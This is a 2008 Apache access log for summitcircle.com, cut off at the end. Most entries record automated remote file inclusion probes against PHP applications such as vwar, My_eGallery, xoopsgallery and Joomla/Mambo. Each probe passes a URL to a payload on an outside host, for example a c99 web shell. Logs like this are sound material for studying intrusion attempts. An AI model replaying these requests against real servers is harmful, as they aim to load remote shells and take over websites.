67.15.70.35 - - [20/Jul/2008:18:36:31 -0700] "GET ///includes/db_adodb.php?baseDir=http://www.legion-of-nemesis.eu/pkinc/rep/sites/include/data/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "summitcircle.com"
74.55.52.194 - - [20/Jul/2008:18:36:32 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://themortonfamily.com/images/oke.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.summitcircle.com"
89.111.173.115 - - [20/Jul/2008:18:36:55 -0700] "GET /index.php?page=&lang=http://www.brazebo.it/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
74.55.52.194 - - [20/Jul/2008:18:37:17 -0700] "GET /logs/access_071029.log//modules/vwar/admin/admin.php?vwar_root=http://themortonfamily.com/images/oke.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.summitcircle.com"
74.55.52.194 - - [20/Jul/2008:18:37:17 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://themortonfamily.com/images/oke.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.summitcircle.com"
74.55.52.194 - - [20/Jul/2008:18:37:17 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://themortonfamily.com/images/oke.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.summitcircle.com"
217.217.156.81 - - [20/Jul/2008:18:38:07 -0700] "GET /logs/access_080210.log//templates/mangobery/footer.sample.php?Site_Path=http://juegos0nline.webcindario.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.summitcircle.com"
210.143.111.146 - - [20/Jul/2008:18:38:09 -0700] "GET //?mosConfig_absolute_pathhttp://buqtery.cc/c99.txt??? HTTP/1.0" 200 763 "-" "libwww-perl/5.53" "www.summitcircle.com"
217.217.156.81 - - [20/Jul/2008:18:38:12 -0700] "GET /logs//templates/mangobery/footer.sample.php?Site_Path=http://juegos0nline.webcindario.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.summitcircle.com"
74.55.52.194 - - [20/Jul/2008:18:38:16 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://themortonfamily.com/images/oke.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.summitcircle.com"
74.55.52.194 - - [20/Jul/2008:18:38:16 -0700] "GET /modules/My_eGallery/index.php?basepath=http://themortonfamily.com/images/oke.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.summitcircle.com"
74.55.52.194 - - [20/Jul/2008:18:38:22 -0700] "GET /logs/access_071105.log//modules/vwar/admin/admin.php?vwar_root=http://themortonfamily.com/images/oke.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.summitcircle.com"
85.114.135.126 - - [20/Jul/2008:18:38:38 -0700] "GET /logs/access_070806.log/index.php?showftp://212.11.127.86/tmp/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
85.114.135.126 - - [20/Jul/2008:18:38:38 -0700] "GET /index.php?showftp://212.11.127.86/tmp/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
85.114.135.126 - - [20/Jul/2008:18:38:38 -0700] "GET /logs/index.php?showftp://212.11.127.86/tmp/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
74.55.52.194 - - [20/Jul/2008:18:38:45 -0700] "GET /logs/access_080526.log//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://themortonfamily.com/images/oke.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.summitcircle.com"
74.55.52.194 - - [20/Jul/2008:18:38:45 -0700] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://themortonfamily.com/images/oke.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.summitcircle.com"
74.55.52.194 - - [20/Jul/2008:18:38:45 -0700] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://themortonfamily.com/images/oke.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.summitcircle.com"
74.55.52.194 - - [20/Jul/2008:18:39:11 -0700] "GET /logs/access_071112.log//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://themortonfamily.com/images/oke.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.summitcircle.com"
85.114.135.126 - - [20/Jul/2008:18:39:17 -0700] "GET /logs/access_070827.log/index.php?showftp://212.11.127.86/tmp/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
210.143.111.146 - - [20/Jul/2008:18:40:09 -0700] "GET /logs/access.log//?mosConfig_absolute_pathhttp://buqtery.cc/c99.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "summitcircle.com"
210.143.111.146 - - [20/Jul/2008:18:40:09 -0700] "GET //?mosConfig_absolute_pathhttp://buqtery.cc/c99.txt??? HTTP/1.0" 200 763 "-" "libwww-perl/5.53" "summitcircle.com"
210.143.111.146 - - [20/Jul/2008:18:40:11 -0700] "GET /logs//?mosConfig_absolute_pathhttp://buqtery.cc/c99.txt??? HTTP/1.0" 200 10508 "-" "libwww-perl/5.53" "summitcircle.com"
79.98.23.1 - - [20/Jul/2008:18:41:03 -0700] "GET /logs/access.log//?mosConfig_absolute_pathhttp://buqtery.cc/c99.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "summitcircle.com"
79.98.23.1 - - [20/Jul/2008:18:41:06 -0700] "GET //?mosConfig_absolute_pathhttp://buqtery.cc/c99.txt??? HTTP/1.1" 200 779 "-" "libwww-perl/5.79" "summitcircle.com"
201.151.123.6 - - [20/Jul/2008:18:41:23 -0700] "GET /errors.php?error=http://realbori.com/bbs/dosiris.txt